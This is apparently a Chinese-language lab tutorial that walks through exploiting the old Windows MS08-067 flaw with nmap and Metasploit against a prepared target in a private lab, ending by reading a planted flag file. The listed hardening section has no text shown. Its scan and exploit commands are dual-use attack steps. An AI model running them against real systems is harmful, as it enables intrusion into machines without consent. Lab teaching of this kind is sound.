文章目录
-
准备工作
-
nmap扫描
-
MS08-067利用
-
漏洞加固
准备工作
准备一台开放445端口和3389端口的靶机,以及一台渗透机。
并在靶机中建立一个名为flag的文档,文档内容为123456,以方便测试。
nmap扫描
由于事先已经做好准备工作,现在只需要扫描445端口和3389端口,检查是否开放,就可以进行我们的漏洞测试。
nmap -sV -T5 -p445,3389 172.16.1.68
(172.16.1.68为靶机ip)
漏洞利用
1.首先使用search搜索ms08_067模块
search ms08_067
2.使用options查看配置参数(有些版本可能不兼容,options用不了就用show options)
options
3.根据配置参数,设置靶机ip
set rhost 172.16.1.68
4.使用exploit模块利用(本图用的run跑出)
5.进入后台,找到我们在靶机所创建的flag,并通过type打开
type flag.txt